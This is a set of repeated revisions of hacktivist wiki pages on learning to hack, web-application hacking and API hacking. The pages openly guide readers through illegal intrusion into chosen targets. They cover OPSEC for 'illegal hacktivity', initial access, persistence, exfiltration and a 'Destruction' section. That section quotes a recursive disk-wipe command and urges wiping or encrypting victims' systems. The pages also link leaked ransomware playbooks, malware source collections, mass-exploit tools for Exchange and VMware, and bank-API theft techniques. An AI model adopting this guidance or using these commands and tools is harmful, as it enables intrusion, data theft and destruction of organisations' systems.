* LockBit 3.0 CobaltStrike: [https://web.archive.org/web/20230701141731if_/https://cdn-147.anonfiles.com/s1cbD0z3z3/4536e4f8-1688221595/LockBit-CobaltStrike.pdf LockBit 3.0 Guide]
* Hacking WordPress with [https://github.com/wpscanteam/wpscan WPScan] and [https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html Metasploit]: https://www.exploit-db.com/docs/english/45556-wordpress-penetration-testing-using-wpscan-and-metasploit.pdf

Resources that assume a tech or hacking background:
* (book) The Hacker Playbook 3
* [[Hack Back! A DIY Guide]]
* https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak
* [https://enlacehacktivista.org/images/8/8f/Flexispy.txt Flexispy Hack Back]
* [https://enlacehacktivista.org/libertycounsel.txt Liberty Counsel Hack Back]
* [https://youtu.be/kCLDqvDnGzA Catalan Police Union Hack Back]
* https://book.hacktricks.xyz
* [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Pronico Hack Back]
* https://github.com/Correia-jpv/fucking-the-book-of-secret-knowledge
* https://github.com/0xPugazh/One-Liners

The Bug Hunters Methodology:
* https://github.com/jhaddix/tbhm
* Application Analysis: https://youtu.be/FqnSAa2KmBI
* The Bug Hunter's Methodology v4.0: https://youtu.be/p4JgIu1mceI?si=jXcYksd4UqodZDBF
* Zseanos Methodology: https://www.bugbountyhunter.com/methodology/zseanos-methodology.pdf

Practice labs:
* https://www.hackthebox.com
* https://academy.hackthebox.com
* https://www.pentesteracademy.com
* https://lab.pentestit.ru
* https://overthewire.org/wargames
* https://www.vulnhub.com/

Appsec:
* https://github.com/paragonie/awesome-appsec

Malware, a collection of malware source code and binaries:
* https://github.com/vxunderground/MalwareSourceCode
* https://github.com/ytisf/theZoo/tree/master/malware

=== General references ===

General resources you may find useful for learning.

See [[General References]]

[https://owasp.org/www-project-top-ten/ OWASP Top 10] is a broad consensus about the most critical security risks to web applications. See TryHackMe's [https://tryhackme.com/room/owasptop10 room] for practical OWASP Top 10 learning and their [https://tryhackme.com/room/owaspjuiceshop Juice Shop].

== Recommended Reading - The Library ==
See recommended reading [https://libgen.fun books] that will aid you in your learning. See [[recommended reading in the library]]

* [https://theanarchistlibrary.org/special/index The Anarchist Library] ([http://libraryqxxiqakubqv3dc2bend2koqsndbwox2johfywcatxie26bsad.onion/special/index Tor])
* Phrack: http://phrack.org

== Operational security ==

Operational security (OPSEC) is crucial for protecting oneself from surveillance and maintaining anonymity while conducting hacktivist operations.

=== Recommended Measures ===

Any illegal hacktivity should be done from an encrypted and separate computer or virtual machine, with all traffic router over Tor.

For more information on recommended operational security measures, see [[Opsec Measures]]

=== Secure Messaging ===

Best practice for secure messaging includes proxying connections over Tor and using end-to-end encryption for messages.

==== Recommended Applications ====

For Jabber/XMPP, make sure to enable OTR or OMEMO encryption. For e-mail use PGP for encryption. For file sharing use onionshare.

For more information on recommended applications, see [[Secure Messaging Applications]]

== Initial Access ==

There are many ways to gain [https://attack.mitre.org/tactics/TA0001/ initial access] into a targets network, from phishing, buying credential access, buying infected machines in corporate networks, password spraying, performing a targeted [https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets penetration test] and spray and pray scanning for vulnerabilities and hacking in. Here we list some resources in these regards.

=== Common Initial Access TTPs ===

For more information on gaining a foothold, see [[Initial Access Tactics, techniques and procedures]]

=== Attacking Common Services ===
Your targets will likely use many services either externally or internally, this could be SSH, RDP, SMB, etc. It's important to know their common misconfigurations, attack vectors, their attack surface and how to hack these various protocols which may serve as the initial access vector. Here we cover various tools, techniques, common misconfigurations, tips and tricks and we cover both internal and external (publicly accessible) networks.

See [[Common Service Attacks]]

=== Scanning and Recon ===

For [https://attack.mitre.org/tactics/TA0043 scanning and recon] tools, see [[Scanning and Recon]]. Make sure to make use of your tool's documentation and read the help menu (-hh/-h/--help).

=== Search Engines ===

Search engines are a useful tool for gathering information and intelligence from publicly available sources. Some are paid and some are free. Make sure to operate good OPSEC whenever placing a purchase for any service that will be used in your recon on a target.

For more information on recommended search engines, see [[Search Engines Resources]]

=== OSINT ===

Open-source intelligence (OSINT) refers to the collection and analysis of information from publicly available sources.

For more information on recommended tools and resources, see [[OSINT Tools and Resources]]

== Persistence ==
Once you've found a weakness in your targets infrastructure and have been able to gain [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures initial access] you'll want to keep it and avoid detection to maintain your access to your targets network for as long as possible.

See [[Persistence]].

== Post exploitation ==

=== Windows ===
For Windows post exploitation, Active Directory and networking hacking, Lateral movement techniques, privilege escalation, defensive and offensive techniques:

See [[Hacking Windows]]

=== Linux ===
For performing Linux post exploitation, gaining persistence, evading detection, privilege escalation and more:

See [[Hacking Linux]]

== Exfiltration ==
One of the main objectives for a hacktivist is that of exfiltrating data, company secrets and if your motivations is that of revealing corruption then this step is of the most importance.

See [[Data Exfiltration]] for techniques and methods for exfiltrating data out of your targets network.

== Destruction ==
There may be times during a hacktivist operation when you come to the end of your hack, you've fully compromised your target, exfiltrated everything you can/want and now before finally leaving the network and leaking all the targets secrets online you want to cause chaos and destruction. [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T As was seen by Guacamaya] where they used <code>sdelete64.exe -accepteula -r -s C:\*</code> to wipe systems attached to Pronicos domain you might also want to do the same for Linux and Windows systems in your operations, maybe you want to recursively print a text file with your manifesto across a system/network, encrypt files beyond recovery or just delete everything.

See [[Chaos and Destruction]] for different ways to achieve this!

== Hacking Misc ==

=== Web Application Hacking ===

See [[Hacking Web Applications]]

=== API Hacking ===
Application Programming Interfaces (APIs) are the plumbing of today’s financial services and FinTech infrastructure, enabling FinTechs to embed banking into their apps and banks to offer a more unified experience to their customers demanding more from their bank ([https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf Knight]). [https://owasp.org/www-project-api-security APIs can be exploited] to aid in data exfiltration and taking advantage of an existing service.

See [[Hacking APIs]]!

=== IoT Hacking ===
* https://github.com/V33RU/IoTSecurity101

=== Hacking The Cloud ===
More and more of corporate networks are moving away from on-prem to in the cloud. Learning how to [https://hackingthe.cloud hack the cloud infrastructure] of your target is a valuable skill and as time progresses more and more networks will migrate towards the cloud.

See [[Cloud Hacking]]

=== Reverse Engineering ===
As was seen by [https://enlacehacktivista.org/index.php?title=Hack_Back!_A_DIY_Guide Phineas Fisher], highly motivated hacktivists who seek to hack their targets by any means necessary should consider 0-day research and exploit development, reverse engineering applications and services that their target may be running to gain an initial foothold and perform post exploitation.

See [[Reverse Engineering]]

== Product-specific Hacking ==

=== Google Workspace ===
https://www.slideshare.net/dafthack/ok-google-how-do-i-red-team-gsuite

=== VMware ===
* Exploiting vCenter to add vSphere user: https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md
* VMware Workspace ONE Access and Identity Manager RCE via SSTI. [https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis CVE-2022-22954:] Unauthenticated server-side template injection. [https://github.com/tunelko/CVE-2022-22954-PoC Mass Exploit]

=== Rocket.Chat ===
* Account hijacking and RCE as admin: [https://web.archive.org/web/20210805092939/https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy]

=== Microsoft Exchange ===

ProxyLogon is dead. It's mitigated by Defender. ProxyShell is not. AMSI catches unmodified public exploits.

* ProxyShell: https://github.com/dmaasland/proxyshell-poc
* Improved proxyshell-poc: https://github.com/horizon3ai/proxyshell
* ProxyShell (webshell via New-MailboxExportRequest): https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md
* ProxyShell (webshell via New-ExchangeCertificate): https://gist.github.com/dmaasland/0720891aaf6dec8d3b42a5b92c8d6f94
* Polymorphic webshells: https://github.com/grCod/poly
* ProxyShell (no webshell, dump mailboxes via PowerShell): https://github.com/Jumbo-WJB/Exchange_SSRF
* Proxylogon, proxyshell, proxyoracle and proxytoken full chain exploit tool: https://github.com/FDlucifer/Proxy-Attackchain
* Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto

Learn to hack

2024-04-12T12:44:37Z

Booda: /* General Resources */

This page aims to compile high quality resources for hackers for both the experienced and inexperienced. All books listed on this page can be [https://libgen.lc found] on [https://libgen.fun/ Library Genesis].

Make sure that you follow good OPSEC when carrying out your operations! See [https://enlacehacktivista.org/index.php?title=Learn_to_hack#Operational_security OPSEC]

== General Resources ==

Resources that assume little to no background knowledge:
* https://www.hoppersroppers.org/training.html
* https://tryhackme.com/

Resources that assume minimal tech background:
* (book) Penetration Testing: A Hands-On Introduction to Hacking
* [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf Bassterlord Networking Manual (translated)] (Focuses on [https://enlacehacktivista.org/index.php?title=Fortinet_SSL_VPN_Path_Traversal exploiting and hacking into networks via Forti SSL VPN])
* [https://web.archive.org/web/20230531144434if_/https://cdn-151.anonfiles.com/vcD868ubz5/08a9b897-1685544763/BasterLord+-+Network+manual+v2.0.pdf Bassterlord Networking Manual v2.0 (translated)] (Focuses on [[VPN brute forcing]])
* Translated: [https://web.archive.org/web/20230404175503if_/https://cdn-150.anonfiles.com/satbX2i8z2/75a3be58-1680631481/Conti_playbook_translated.pdf Conti playbook]
* LockBit 3.0 CobaltStrike: [https://web.archive.org/web/20230701141731if_/https://cdn-147.anonfiles.com/s1cbD0z3z3/4536e4f8-1688221595/LockBit-CobaltStrike.pdf LockBit 3.0 Guide]
* Hacking WordPress with [https://github.com/wpscanteam/wpscan WPScan] and [https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html Metasploit]: https://www.exploit-db.com/docs/english/45556-wordpress-penetration-testing-using-wpscan-and-metasploit.pdf

Resources that assume a tech or hacking background:
* (book) The Hacker Playbook 3
* [[Hack Back! A DIY Guide]]
* https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak
* [https://enlacehacktivista.org/images/8/8f/Flexispy.txt Flexispy Hack Back]
* [https://enlacehacktivista.org/libertycounsel.txt Liberty Counsel Hack Back]
* [https://youtu.be/kCLDqvDnGzA Catalan Police Union Hack Back]
* https://book.hacktricks.xyz
* [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Pronico Hack Back]
* https://github.com/Correia-jpv/fucking-the-book-of-secret-knowledge
* https://github.com/0xPugazh/One-Liners

The Bug Hunters Methodology:
* https://github.com/jhaddix/tbhm
* Application Analysis: https://youtu.be/FqnSAa2KmBI
* The Bug Hunter's Methodology v4.0: https://youtu.be/p4JgIu1mceI?si=jXcYksd4UqodZDBF
Practice labs:
* https://www.hackthebox.com
* https://academy.hackthebox.com
* https://www.pentesteracademy.com
* https://lab.pentestit.ru
* https://overthewire.org/wargames
* https://www.vulnhub.com/

Appsec:
* https://github.com/paragonie/awesome-appsec

Malware, a collection of malware source code and binaries:
* https://github.com/vxunderground/MalwareSourceCode
* https://github.com/ytisf/theZoo/tree/master/malware

=== General references ===

General resources you may find useful for learning.

See [[General References]]

[https://owasp.org/www-project-top-ten/ OWASP Top 10] is a broad consensus about the most critical security risks to web applications. See TryHackMe's [https://tryhackme.com/room/owasptop10 room] for practical OWASP Top 10 learning and their [https://tryhackme.com/room/owaspjuiceshop Juice Shop].

== Recommended Reading - The Library ==
See recommended reading [https://libgen.fun books] that will aid you in your learning. See [[recommended reading in the library]]

* [https://theanarchistlibrary.org/special/index The Anarchist Library] ([http://libraryqxxiqakubqv3dc2bend2koqsndbwox2johfywcatxie26bsad.onion/special/index Tor])
* Phrack: http://phrack.org

== Operational security ==

Operational security (OPSEC) is crucial for protecting oneself from surveillance and maintaining anonymity while conducting hacktivist operations.

=== Recommended Measures ===

Any illegal hacktivity should be done from an encrypted and separate computer or virtual machine, with all traffic router over Tor.

For more information on recommended operational security measures, see [[Opsec Measures]]

=== Secure Messaging ===

Best practice for secure messaging includes proxying connections over Tor and using end-to-end encryption for messages.

==== Recommended Applications ====

For Jabber/XMPP, make sure to enable OTR or OMEMO encryption. For e-mail use PGP for encryption. For file sharing use onionshare.

For more information on recommended applications, see [[Secure Messaging Applications]]

== Initial Access ==

There are many ways to gain [https://attack.mitre.org/tactics/TA0001/ initial access] into a targets network, from phishing, buying credential access, buying infected machines in corporate networks, password spraying, performing a targeted [https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets penetration test] and spray and pray scanning for vulnerabilities and hacking in. Here we list some resources in these regards.

=== Common Initial Access TTPs ===

For more information on gaining a foothold, see [[Initial Access Tactics, techniques and procedures]]

=== Attacking Common Services ===
Your targets will likely use many services either externally or internally, this could be SSH, RDP, SMB, etc. It's important to know their common misconfigurations, attack vectors, their attack surface and how to hack these various protocols which may serve as the initial access vector. Here we cover various tools, techniques, common misconfigurations, tips and tricks and we cover both internal and external (publicly accessible) networks.

See [[Common Service Attacks]]

=== Scanning and Recon ===

For [https://attack.mitre.org/tactics/TA0043 scanning and recon] tools, see [[Scanning and Recon]]. Make sure to make use of your tool's documentation and read the help menu (-hh/-h/--help).

=== Search Engines ===

Search engines are a useful tool for gathering information and intelligence from publicly available sources. Some are paid and some are free. Make sure to operate good OPSEC whenever placing a purchase for any service that will be used in your recon on a target.

For more information on recommended search engines, see [[Search Engines Resources]]

=== OSINT ===

Open-source intelligence (OSINT) refers to the collection and analysis of information from publicly available sources.

For more information on recommended tools and resources, see [[OSINT Tools and Resources]]

== Persistence ==
Once you've found a weakness in your targets infrastructure and have been able to gain [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures initial access] you'll want to keep it and avoid detection to maintain your access to your targets network for as long as possible.

See [[Persistence]].

== Post exploitation ==

=== Windows ===
For Windows post exploitation, Active Directory and networking hacking, Lateral movement techniques, privilege escalation, defensive and offensive techniques:

See [[Hacking Windows]]

=== Linux ===
For performing Linux post exploitation, gaining persistence, evading detection, privilege escalation and more:

See [[Hacking Linux]]

== Exfiltration ==
One of the main objectives for a hacktivist is that of exfiltrating data, company secrets and if your motivations is that of revealing corruption then this step is of the most importance.

See [[Data Exfiltration]] for techniques and methods for exfiltrating data out of your targets network.

== Destruction ==
There may be times during a hacktivist operation when you come to the end of your hack, you've fully compromised your target, exfiltrated everything you can/want and now before finally leaving the network and leaking all the targets secrets online you want to cause chaos and destruction. [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T As was seen by Guacamaya] where they used <code>sdelete64.exe -accepteula -r -s C:\*</code> to wipe systems attached to Pronicos domain you might also want to do the same for Linux and Windows systems in your operations, maybe you want to recursively print a text file with your manifesto across a system/network, encrypt files beyond recovery or just delete everything.

See [[Chaos and Destruction]] for different ways to achieve this!

== Hacking Misc ==

=== Web Application Hacking ===

See [[Hacking Web Applications]]

=== API Hacking ===
Application Programming Interfaces (APIs) are the plumbing of today’s financial services and FinTech infrastructure, enabling FinTechs to embed banking into their apps and banks to offer a more unified experience to their customers demanding more from their bank ([https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf Knight]). [https://owasp.org/www-project-api-security APIs can be exploited] to aid in data exfiltration and taking advantage of an existing service.

See [[Hacking APIs]]!

=== IoT Hacking ===
* https://github.com/V33RU/IoTSecurity101

=== Hacking The Cloud ===
More and more of corporate networks are moving away from on-prem to in the cloud. Learning how to [https://hackingthe.cloud hack the cloud infrastructure] of your target is a valuable skill and as time progresses more and more networks will migrate towards the cloud.

See [[Cloud Hacking]]

=== Reverse Engineering ===
As was seen by [https://enlacehacktivista.org/index.php?title=Hack_Back!_A_DIY_Guide Phineas Fisher], highly motivated hacktivists who seek to hack their targets by any means necessary should consider 0-day research and exploit development, reverse engineering applications and services that their target may be running to gain an initial foothold and perform post exploitation.

See [[Reverse Engineering]]

== Product-specific Hacking ==

=== Google Workspace ===
https://www.slideshare.net/dafthack/ok-google-how-do-i-red-team-gsuite

=== VMware ===
* Exploiting vCenter to add vSphere user: https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md
* VMware Workspace ONE Access and Identity Manager RCE via SSTI. [https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis CVE-2022-22954:] Unauthenticated server-side template injection. [https://github.com/tunelko/CVE-2022-22954-PoC Mass Exploit]

=== Rocket.Chat ===
* Account hijacking and RCE as admin: [https://web.archive.org/web/20210805092939/https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy]

=== Microsoft Exchange ===

ProxyLogon is dead. It's mitigated by Defender. ProxyShell is not. AMSI catches unmodified public exploits.

* ProxyShell: https://github.com/dmaasland/proxyshell-poc
* Improved proxyshell-poc: https://github.com/horizon3ai/proxyshell
* ProxyShell (webshell via New-MailboxExportRequest): https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md
* ProxyShell (webshell via New-ExchangeCertificate): https://gist.github.com/dmaasland/0720891aaf6dec8d3b42a5b92c8d6f94
* Polymorphic webshells: https://github.com/grCod/poly
* ProxyShell (no webshell, dump mailboxes via PowerShell): https://github.com/Jumbo-WJB/Exchange_SSRF
* Proxylogon, proxyshell, proxyoracle and proxytoken full chain exploit tool: https://github.com/FDlucifer/Proxy-Attackchain
* Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto

Hacking Web Applications

2024-04-11T17:38:24Z

Booda:

'''NOTE:''' This page is under construction
== Web Application Hacking Methodology - Overview ==

=== Information Gathering - OSINT ===

==== Target Organization ====

===== Basic Information =====

====== Name ======

====== Physical Address ======

====== Employee Count ======

====== Employee Roles ======

====== Target Company TLDs ======

====== Company Acquisitions ======

====== Social Media Presence ======

====== Revenue ======

====== Leadership ======

====== Job Openings ======

==== Organization Employees ====

===== Email Addresses =====

===== Phone Numbers =====

===== Social Media Profiles =====

===== Breached Emails =====

===== Breached Usernames =====

===== Breached Passwords =====

===== Curriculum Vitae Discovery =====

=== Reconnaissance ===

==== Passive ====

===== Dorking =====

===== DNS Enumeration =====

===== Domain Information =====

===== Certificate Information =====

===== Web Stack Technology Identification =====

===== Port Scanning & Service Analysis =====

===== Discovering Historical Data =====

===== ASN Enumeration =====

==== Active ====

===== Security Control Identification =====

===== Port Scanning & Service Enumeration =====

===== Subdomain Enumeration =====

===== Web Stack Technology Identification =====

===== Walking the Application =====

===== Web Crawling =====

===== Source Code Analysis - JavaScript =====

=== Content Discovery ===

===== Subdomain Brute-forcing =====

===== Directory Brute-forcing =====

===== Parameter Fuzzing =====

===== Endpoint Analysis =====

=== Vulnerability Scanning ===

==== CVE Discovery ====

==== Misconfiguration Discovery ====

==== Common Vulns ====

==== Content Management System & Plugins ====

=== Application Analysis ===

==== Bypassing Security Controls ====

==== Exploit Discovery ====

==== APIs ====

==== Open Redirects ====

==== IDOR ====

==== Authentication ====

==== File Upload Vulnerabilities ====

=== Low Hanging Fruits ===

==== S3 Buckets ====

==== Subdomain Takeover ====

==== Exposed Assets ====

==== Injections ====

==== Default Credentials ====

==== Exposed Secrets ====

=== Tools ===
{| class="wikitable" style="width:600px"
|-
! Tool !! Description !! Link
|-
| Example || Example || Example
|-
| Example || Example || Example
|-
| Example || Example || Example
|}

Hacking Web Applications

2024-04-11T17:37:00Z

Booda: Implementing Jason Haddix Methodology geared towards hacktivists

'''NOTE:''' This page is under construction
== Web Application Hacking Methodology - Overview ==

=== Information Gathering - OSINT ===

==== Target Organization ====

===== Basic Information =====

====== Name ======

====== Physical Address ======

====== Employee Count ======

====== Employee Roles ======

====== Target Company TLDs ======

====== Company Acquisitions ======

====== Social Media Presence ======

====== Revenue ======

====== Leadership ======

====== Job Openings ======

==== Organization Employees ====

===== Email Addresses =====

===== Phone Numbers =====

===== Social Media Profiles =====

===== Breached Emails =====

===== Breached Usernames =====

===== Breached Passwords =====

===== Curriculum Vitae Discovery =====

=== Reconnaissance ===

==== Passive ====

===== Dorking =====

===== DNS Enumeration =====

===== Domain Information =====

===== Certificate Information =====

===== Web Stack Technology Identification =====

===== Port Scanning & Service Analysis =====

===== Discovering Historical Data =====

===== ASN Enumeration =====

==== Active ====

===== Security Control Identification =====

===== Port Scanning & Service Enumeration =====

===== Subdomain Enumeration =====

===== Web Stack Technology Identification =====

===== Walking the Application =====

===== Web Crawling =====

===== Source Code Analysis - JavaScript =====

=== Content Discovery ===

===== Subdomain Brute-forcing =====

===== Directory Brute-forcing =====

===== Parameter Fuzzing =====

===== Endpoint Analysis =====

=== Vulnerability Scanning ===

==== CVE Discovery ====

==== Misconfiguration Discovery ====

==== Common Vulns ====

==== Content Management System & Plugins ====

=== Application Analysis ===

==== Bypassing Security Controls ====

==== Exploit Discovery ====

==== Payloads ====

==== Open Redirects ====

==== IDOR ====

==== Authentication ====

==== File Upload Vulnerabilities ====

=== Low Hanging Fruits ===

==== S3 Buckets ====

==== Subdomain Takeover ====

==== Exposed Assets ====

==== Injections ====

==== Default Credentials ====

==== Exposed Secrets ====

=== Tools ===
{| class="wikitable" style="width:600px"
|-
! Tool !! Description !! Link
|-
| Example || Example || Example
|-
| Example || Example || Example
|-
| Example || Example || Example
|}

Hacking APIs

2024-03-31T10:38:43Z

Booda: /* Tools */

Web Application Programming Interfaces (APIs) make up [https://www.akamai.com/blog/security/api-discovery-and-profiling-visibility-to-protection 83% of all web traffic] and [https://www.ibm.com/downloads/cas/WMDZOWK6 two thirds of all cloud breaches are due to misconfigured APIs] with developers hard coding credentials and exposing API keys. Organizations are using them more and more to deliver content, handle and transfer data and to implement more functionality into their services and web applications, not to mention APIs have direct back-end database access. Knights [https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf white paper] show cases how web APIs can be exploited via [https://owasp.org/www-project-api-security API1:2023 - Broken Object Level Authorization (BOLA)] vulnerability to transfer money in and out of bank accounts and change Visa ATM debit PIN codes. Exploiting web APIs has also been a vector for a lot of [https://www.linkedin.com/pulse/api-exploitation-leading-cause-modern-day-data-gameli-mawudor-phd data breaches].

Currently there is a severe lack of security testing against APIs (mobile APIs especially) from the white hats, not a lot of efforts in testing and protecting APIs and typically organizations "protect" their APIs using WAFs which are ineffective at defending APIs as they are designed to protect web applications and not logic-based exploits.

The top 3 most commonly used web APIs used today (2023) are: Rest, GraphQL and SOAP. Common API data transfer formats are: JSON, XML and YAML. It's an easier attack vector (for now). Learn how to hack web APIs to facilitate your targeted attacks!

See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon Scanning and Recon], [https://enlacehacktivista.org/index.php?title=Search_Engines_Resources Search Engines], [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures Initial Access Tactics, techniques and procedures] and a [https://youtu.be/FqnSAa2KmBI hackers methodology] and [https://youtu.be/p4JgIu1mceI recon] as prerequisite's to hacking APIs.

== Prerequisite reading ==
* OWASP API Security Top 10: https://owasp.org/www-project-api-security | https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf
* (Book) Hacking APIs: Breaking Web Application Programming Interfaces
* (Book) Black Hat GraphQL: Attacking Next Generation APIs
* API Whitepapers and reports: https://salt.security/resources
* (Book) Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities (Chapter 24 - API Hacking)
* SCORCHED EARTH: [https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf HACKING BANKS AND CRYPTOCURRENCY EXCHANGES THROUGH THEIR APIS]
* Exploiting GraphQL: https://blog.assetnote.io/2021/08/29/exploiting-graphql
* HackTricks - GraphQL: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql

== Testing environments ==
* Completely ridiculous API (crAPI) - Purposefully vulnerable API: https://github.com/OWASP/crAPI
* Damn Vulnerable GraphQL Application - Intentionally vulnerable GraphQL API: https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application
* OWASP Juice Shop - Insecure web application (uses Rest APIs): https://github.com/juice-shop/juice-shop
* The Pixi module is a MEAN Stack web app with wildly insecure APIs!: https://github.com/DevSlop/Pixi
* Vulnerable REST API with OWASP top 10 vulnerabilities for security testing: https://github.com/erev0s/VAmPI

=== Labs ===
* HackTheBox (HTB) Academy: [https://academy.hackthebox.com/course/preview/web-service--api-attacks Web Service & API Attacks] [Paid]
* TryHackMe (THM): [https://tryhackme.com/room/owaspapisecuritytop105w OWASP API Security Top 10 - 1] [Paid]
** TryHackMe (THM): [https://tryhackme.com/room/owaspapisecuritytop10d0 OWASP API Security Top 10 - 2] [Paid]

== Tools ==
* A collection of API Security tools and resources: https://github.com/arainho/awesome-api-security
* A comprehensive API hacking framework (A-Z)! MindAPI: https://dsopas.github.io/MindAPI/play
* Decode JSON Web Tokens (Online): https://jwt.io
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token JWT - JSON Web Token]
* A toolkit for testing, tweaking and cracking JSON Web Tokens: https://github.com/ticarpi/jwt_tool
* Obtain GraphQL API schema even if the introspection is disabled: https://github.com/nikitastupin/clairvoyance
* HTTP parameter discovery suite: https://github.com/s0md3v/Arjun
* NSE Script for GraphQL Introspection Check: https://github.com/dolevf/nmap-graphql-introspection-nse
* graphw00f is GraphQL Server Engine Fingerprinting utility: https://github.com/dolevf/graphw00f
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection GraphQL Injection]
* GraphQL Introspection analyzer: https://github.com/gwen001/graphql-introspection-analyzer
* If you have found API keys perhaps in a JavaScript file but are not sure how to test their validity use keyhacks: https://github.com/streaak/keyhacks

=== Intercepting proxies ===
These let you view, edit, and replay requests, and are extremely useful for finding vulnerabilities in web applications, mobile and APIs.
* https://www.postman.com (API focused)
* https://portswigger.net/burp (If a WAF is blocking Burpsuite then [https://stackoverflow.com/questions/70129432/how-to-bypass-cloudflare-protection-with-burp try editing your user-agent string])
* https://www.zaproxy.org | [https://www.zaproxy.org/blog/2020-08-28-introducing-the-graphql-add-on-for-zap GraphQL Add-on for ZAP] to exploit GraphQL Introspection.

=== Fuzzing ===
* https://github.com/assetnote/kiterunner (API focused)
* https://github.com/ffuf/ffuf
* https://www.kali.org/tools/wfuzz

==== Wordlists ====
[https://github.com/assetnote/kiterunner Kiterunner] word lists:
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
# https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
# https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/swagger-files.tar
# https://wordlists-cdn.assetnote.io/data/kiterunner/swagger-wordlist.txt
Web API specific word lists:
* A list of 3203 common API endpoints and objects designed for fuzzing: https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d
* A wordlist of API names for web application assessments: https://github.com/chrislockard/api_wordlist
* A collection of API word lists: https://github.com/hAPI-hacker/Hacking-APIs
* GraphQL word list: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/graphql.txt

== Exploitation ==
Although API specific exploitation may require scripting or custom payloads to mass scrape data or exploit logic based vulnerabilities it's still worth knowing common payloads and exploit tools for web applications: https://enlacehacktivista.org/index.php?title=Exploitation

Hacking APIs

2024-03-31T10:38:24Z

Booda: /* Tools */

Web Application Programming Interfaces (APIs) make up [https://www.akamai.com/blog/security/api-discovery-and-profiling-visibility-to-protection 83% of all web traffic] and [https://www.ibm.com/downloads/cas/WMDZOWK6 two thirds of all cloud breaches are due to misconfigured APIs] with developers hard coding credentials and exposing API keys. Organizations are using them more and more to deliver content, handle and transfer data and to implement more functionality into their services and web applications, not to mention APIs have direct back-end database access. Knights [https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf white paper] show cases how web APIs can be exploited via [https://owasp.org/www-project-api-security API1:2023 - Broken Object Level Authorization (BOLA)] vulnerability to transfer money in and out of bank accounts and change Visa ATM debit PIN codes. Exploiting web APIs has also been a vector for a lot of [https://www.linkedin.com/pulse/api-exploitation-leading-cause-modern-day-data-gameli-mawudor-phd data breaches].

Currently there is a severe lack of security testing against APIs (mobile APIs especially) from the white hats, not a lot of efforts in testing and protecting APIs and typically organizations "protect" their APIs using WAFs which are ineffective at defending APIs as they are designed to protect web applications and not logic-based exploits.

The top 3 most commonly used web APIs used today (2023) are: Rest, GraphQL and SOAP. Common API data transfer formats are: JSON, XML and YAML. It's an easier attack vector (for now). Learn how to hack web APIs to facilitate your targeted attacks!

See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon Scanning and Recon], [https://enlacehacktivista.org/index.php?title=Search_Engines_Resources Search Engines], [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures Initial Access Tactics, techniques and procedures] and a [https://youtu.be/FqnSAa2KmBI hackers methodology] and [https://youtu.be/p4JgIu1mceI recon] as prerequisite's to hacking APIs.

== Prerequisite reading ==
* OWASP API Security Top 10: https://owasp.org/www-project-api-security | https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf
* (Book) Hacking APIs: Breaking Web Application Programming Interfaces
